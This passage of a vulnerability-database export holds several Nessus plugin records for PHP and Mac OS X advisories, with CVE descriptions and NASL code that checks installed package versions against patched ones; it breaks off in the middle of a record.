function to perform a DNS\n query.(CVE-2014-3597)\n\n - A buffer overflow flaw was found in the way PHP's Phar\n extension parsed Phar archives. A specially crafted\n archive could cause PHP to crash or, possibly, execute\n arbitrary code when opened.(CVE-2015-3329)\n\n - Integer overflow in the ftp_genlist function in\n ext/ftp/ftp.c in PHP before 5.4.42, 5.5.x before\n 5.5.26, and 5.6.x before 5.6.10 allows remote FTP\n servers to execute arbitrary code via a long reply to a\n LIST command, leading to a heap-based buffer overflow.\n NOTE: this vulnerability exists because of an\n incomplete fix for CVE-2015-4022.(CVE-2015-4643)\n\n - A type confusion issue was found in PHP's phpinfo()\n function. A malicious script author could possibly use\n this flaw to disclose certain portions of server\n memory.(CVE-2014-4721)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1543\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a562103a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6836\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"php-5.4.16-45.h9\",\n \"php-cli-5.4.16-45.h9\",\n \"php-common-5.4.16-45.h9\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-09T01:32:37", "description": "The remote host is affected by the vulnerability described in GLSA-201606-10 (PHP: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in PHP. Please review the CVE identifiers referenced below for details.\n Impact :\n\n An attacker can possibly execute arbitrary code or create a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-20T00:00:00", "type": "nessus", "title": "GLSA-201606-10 : PHP: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-6501", "CVE-2014-9705", "CVE-2014-9709", "CVE-2015-0231", "CVE-2015-0273", "CVE-2015-1351", "CVE-2015-1352", "CVE-2015-2301", "CVE-2015-2348", "CVE-2015-2783", "CVE-2015-2787", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-4021", "CVE-2015-4022", "CVE-2015-4025", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-4148", "CVE-2015-4642", "CVE-2015-4643", "CVE-2015-4644", "CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7803", "CVE-2015-7804"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:php", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201606-10.NASL", "href": "https://www.tenable.com/plugins/nessus/91704", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201606-10.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91704);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-6501\", \"CVE-2014-9705\", \"CVE-2014-9709\", \"CVE-2015-0231\", \"CVE-2015-0273\", \"CVE-2015-1351\", \"CVE-2015-1352\", \"CVE-2015-2301\", \"CVE-2015-2348\", \"CVE-2015-2783\", \"CVE-2015-2787\", \"CVE-2015-3329\", \"CVE-2015-3330\", \"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4025\", \"CVE-2015-4026\", \"CVE-2015-4147\", \"CVE-2015-4148\", \"CVE-2015-4642\", \"CVE-2015-4643\", \"CVE-2015-4644\", \"CVE-2015-6831\", \"CVE-2015-6832\", \"CVE-2015-6833\", \"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\", \"CVE-2015-7803\", \"CVE-2015-7804\");\n script_xref(name:\"GLSA\", value:\"201606-10\");\n\n script_name(english:\"GLSA-201606-10 : PHP: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201606-10\n(PHP: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in PHP. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n An attacker can possibly execute arbitrary code or create a Denial of\n Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201606-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All PHP 5.4 users should upgrade to the latest 5.5 stable branch, as PHP\n 5.4 is now masked in Portage:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev=lang/php-5.5.33'\n All PHP 5.5 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev=lang/php-5.5.33'\n All PHP 5.6 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev=lang/php-5.6.19'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-lang/php\", unaffected:make_list(\"ge 5.6.19\", \"rge 5.5.33\", \"rge 5.5.34\", \"rge 5.5.35\", \"rge 5.5.36\", \"rge 5.5.37\", \"rge 5.5.38\"), vulnerable:make_list(\"lt 5.6.19\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"PHP\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:32:24", "description": "The remote host is running a version of Mac OS X 10.9.5 or 10.10.5 that is missing Security Update 2015-004 or 2015-007. It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - Accelerate Framework\n - apache_mod_php\n - ATS\n - Audio\n - CFNetwork\n - CoreGraphics\n - CoreText\n - EFI\n - FontParser\n - Grand Central Dispatch\n - ImageIO\n - IOAcceleratorFamily\n - Kernel\n - libarchive\n - MCX Application Restrictions\n - OpenGL\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-11-10T00:00:00", "type": "nessus", "title": "Mac OS X Multiple Vulnerabilities (Security Updates 2015-004 / 2015-007)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235", "CVE-2015-0273", "CVE-2015-4860", "CVE-2015-5924", "CVE-2015-5925", "CVE-2015-5926", "CVE-2015-5927", "CVE-2015-5932", "CVE-2015-5933", "CVE-2015-5934", "CVE-2015-5935", "CVE-2015-5936", "CVE-2015-5937", "CVE-2015-5938", "CVE-2015-5939", "CVE-2015-5940", "CVE-2015-5942", "CVE-2015-5944", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-6975", "CVE-2015-6976", "CVE-2015-6977", "CVE-2015-6978", "CVE-2015-6984", "CVE-2015-6985", "CVE-2015-6989", "CVE-2015-6991", "CVE-2015-6992", "CVE-2015-6993", "CVE-2015-6996", "CVE-2015-7009", "CVE-2015-7010", "CVE-2015-7016", "CVE-2015-7018", "CVE-2015-7023", "CVE-2015-7035"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2015-007.NASL", "href": "https://www.tenable.com/plugins/nessus/86829", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86829);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2015-0235\",\n \"CVE-2015-0273\",\n \"CVE-2015-4860\",\n \"CVE-2015-5924\",\n \"CVE-2015-5925\",\n \"CVE-2015-5926\",\n \"CVE-2015-5927\",\n \"CVE-2015-5932\",\n \"CVE-2015-5933\",\n \"CVE-2015-5934\",\n \"CVE-2015-5935\",\n \"CVE-2015-5936\",\n \"CVE-2015-5937\",\n \"CVE-2015-5938\",\n \"CVE-2015-5939\",\n \"CVE-2015-5940\",\n \"CVE-2015-5942\",\n \"CVE-2015-5944\",\n \"CVE-2015-6834\",\n \"CVE-2015-6835\",\n \"CVE-2015-6836\",\n \"CVE-2015-6837\",\n \"CVE-2015-6838\",\n \"CVE-2015-6975\",\n \"CVE-2015-6976\",\n \"CVE-2015-6977\",\n \"CVE-2015-6978\",\n \"CVE-2015-6984\",\n \"CVE-2015-6985\",\n \"CVE-2015-6989\",\n \"CVE-2015-6991\",\n \"CVE-2015-6992\",\n \"CVE-2015-6993\",\n \"CVE-2015-6996\",\n \"CVE-2015-7009\",\n \"CVE-2015-7010\",\n \"CVE-2015-7016\",\n \"CVE-2015-7018\",\n \"CVE-2015-7023\",\n \"CVE-2015-7035\"\n );\n script_bugtraq_id(\n 69477,\n 72325,\n 72701,\n 74971,\n 76317,\n 76644,\n 76649,\n 76733,\n 76734,\n 76738,\n 77162,\n 77263,\n 77265,\n 77266,\n 77270\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2015-10-21-4\");\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Updates 2015-004 / 2015-007)\");\n script_summary(english:\"Checks for the presence of Security Update 2015-004 and 2015-007.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.9.5 or 10.10.5\nthat is missing Security Update 2015-004 or 2015-007. It is,\ntherefore, affected by multiple vulnerabilities in the following\ncomponents :\n\n - Accelerate Framework\n - apache_mod_php\n - ATS\n - Audio\n - CFNetwork\n - CoreGraphics\n - CoreText\n - EFI\n - FontParser\n - Grand Central Dispatch\n - ImageIO\n - IOAcceleratorFamily\n - Kernel\n - libarchive\n - MCX Application Restrictions\n - OpenGL\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT205375\");\n # https://lists.apple.com/archives/security-announce/2015/Oct/msg00005.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7e01da3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2015-004 / 2015-007 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:\"-\");\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\n# Advisory states that update 2015-004 is available for 10.10.5 and update 2015-007 is available for 10.9.5\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\nif (!ereg(pattern:\"Mac OS X 10\\.(9|10)\\.5([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.9.5 or Mac OS X 10.10.5\");\n\nif (\"10.9.5\" >< os) patch = \"2015-007\";\nelse if (\"10.10.5\" >< os) patch = \"2015-004\";\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = egrep(pattern:\"^com\\.apple\\.pkg\\.update\\.security\\..*bom$\", string:packages);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n match = eregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(match[1]) || empty_or_null(match[2]))\n continue;\n\n patch_found = check_patch(year:int(match[1]), number:int(match[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-11T18:35:58", "description": "The SplObjectStorage unserialize implementation in ext/spl/spl_observer.c in PHP before 7.0.12 does not verify that a key is an object, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access) via crafted serialized data. (CVE-2016-7480)\n\nUse-after-free vulnerability in the CURLFile implementation in ext/curl/curl_file.c in PHP 7.x before 7.0.12 allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that is mishandled during __wakeup processing. (CVE-2016-9137)\n\nStack consumption vulnerability in the gdImageFillToBorder function in gd.c in the GD Graphics Library (aka libgd) before 2.2.2, as used in PHP 7.x before 7.0.13, allows remote attackers to cause a denial of service (segmentation violation) via a crafted imagefilltoborder call that triggers use of a negative color value. (CVE-2016-9933)\n\next/wddx/wddx.c in PHP 7.x before 7.0.13 allows remote attackers to cause a denial of service (NULL pointer dereference) via crafted serialized data in a wddxPacket XML document, as demonstrated by a PDORow string. (CVE-2016-9934)\n\nThe php_wddx_push_element function in ext/wddx/wddx.c in PHP 7.x before 7.0.14 allows remote attackers to cause a denial of service (out-of-bounds read and memory corruption) or possibly have unspecified other impact via an empty boolean element in a wddxPacket XML document. (CVE-2016-9935)\n\nThe unserialize implementation in ext/standard/var.c in PHP 7.x before 7.0.14 allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via crafted serialized data. This vulnerability exists because of an incomplete fix for CVE-2015-6834 . (CVE-2016-9936)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-01-27T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : php70 (ALAS-2017-788)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2016-7480", "CVE-2016-9137", "CVE-2016-9933", "CVE-2016-9934", "CVE-2016-9935", "CVE-2016-9936"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:php70", "p-cpe:/a:amazon:linux:php70-bcmath", "p-cpe:/a:amazon:linux:php70-cli", "p-cpe:/a:amazon:linux:php70-common", "p-cpe:/a:amazon:linux:php70-dba", "p-cpe:/a:amazon:linux:php70-dbg", "p-cpe:/a:amazon:linux:php70-debuginfo", "p-cpe:/a:amazon:linux:php70-devel", "p-cpe:/a:amazon:linux:php70-embedded", "p-cpe:/a:amazon:linux:php70-enchant", "p-cpe:/a:amazon:linux:php70-fpm", "p-cpe:/a:amazon:linux:php70-gd", "p-cpe:/a:amazon:linux:php70-gmp", "p-cpe:/a:amazon:linux:php70-imap", "p-cpe:/a:amazon:linux:php70-intl", "p-cpe:/a:amazon:linux:php70-json", "p-cpe:/a:amazon:linux:php70-ldap", "p-cpe:/a:amazon:linux:php70-mbstring", "p-cpe:/a:amazon:linux:php70-mcrypt", "p-cpe:/a:amazon:linux:php70-mysqlnd", "p-cpe:/a:amazon:linux:php70-odbc", "p-cpe:/a:amazon:linux:php70-opcache", "p-cpe:/a:amazon:linux:php70-pdo", "p-cpe:/a:amazon:linux:php70-pdo-dblib", "p-cpe:/a:amazon:linux:php70-pgsql", "p-cpe:/a:amazon:linux:php70-process", "p-cpe:/a:amazon:linux:php70-pspell", "p-cpe:/a:amazon:linux:php70-recode", "p-cpe:/a:amazon:linux:php70-snmp", "p-cpe:/a:amazon:linux:php70-soap", "p-cpe:/a:amazon:linux:php70-tidy", "p-cpe:/a:amazon:linux:php70-xml", "p-cpe:/a:amazon:linux:php70-xmlrpc", "p-cpe:/a:amazon:linux:php70-zip", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2017-788.NASL", "href": "https://www.tenable.com/plugins/nessus/96806", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-788.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96806);\n script_version(\"3.2\");\n script_cvs_date(\"Date: 2018/04/18 15:09:36\");\n\n script_cve_id(\"CVE-2016-7480\", \"CVE-2016-9137\", \"CVE-2016-9933\", \"CVE-2016-9934\", \"CVE-2016-9935\", \"CVE-2016-9936\");\n script_xref(name:\"ALAS\", value:\"2017-788\");\n\n script_name(english:\"Amazon Linux AMI : php70 (ALAS-2017-788)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SplObjectStorage unserialize implementation in\next/spl/spl_observer.c in PHP before 7.0.12 does not verify that a key\nis an object, which allows remote attackers to execute arbitrary code\nor cause a denial of service (uninitialized memory access) via crafted\nserialized data. (CVE-2016-7480)\n\nUse-after-free vulnerability in the CURLFile implementation in\next/curl/curl_file.c in PHP 7.x before 7.0.12 allows remote attackers\nto cause a denial of service or possibly have unspecified other impact\nvia crafted serialized data that is mishandled during __wakeup\nprocessing. (CVE-2016-9137)\n\nStack consumption vulnerability in the gdImageFillToBorder function in\ngd.c in the GD Graphics Library (aka libgd) before 2.2.2, as used in\nPHP 7.x before 7.0.13, allows remote attackers to cause a denial of\nservice (segmentation violation) via a crafted imagefilltoborder call\nthat triggers use of a negative color value. (CVE-2016-9933)\n\next/wddx/wddx.c in PHP 7.x before 7.0.13 allows remote attackers to\ncause a denial of service (NULL pointer dereference) via crafted\nserialized data in a wddxPacket XML document, as demonstrated by a\nPDORow string. (CVE-2016-9934)\n\nThe php_wddx_push_element function in ext/wddx/wddx.c in PHP 7.x\nbefore 7.0.14 allows remote attackers to cause a denial of service\n(out-of-bounds read and memory corruption) or possibly have\nunspecified other impact via an empty boolean element in a wddxPacket\nXML document. (CVE-2016-9935)\n\nThe unserialize implementation in ext/standard/var.c in PHP 7.x before\n7.0.14 allows remote attackers to cause a denial of service\n(use-after-free) or possibly have unspecified other impact via crafted\nserialized data. This vulnerability exists because of an incomplete\nfix for CVE-2015-6834 . (CVE-2016-9936)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-788.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php70' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-pdo-dblib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-soap\");\n script_set_attribute(attribute:\"cpe\", 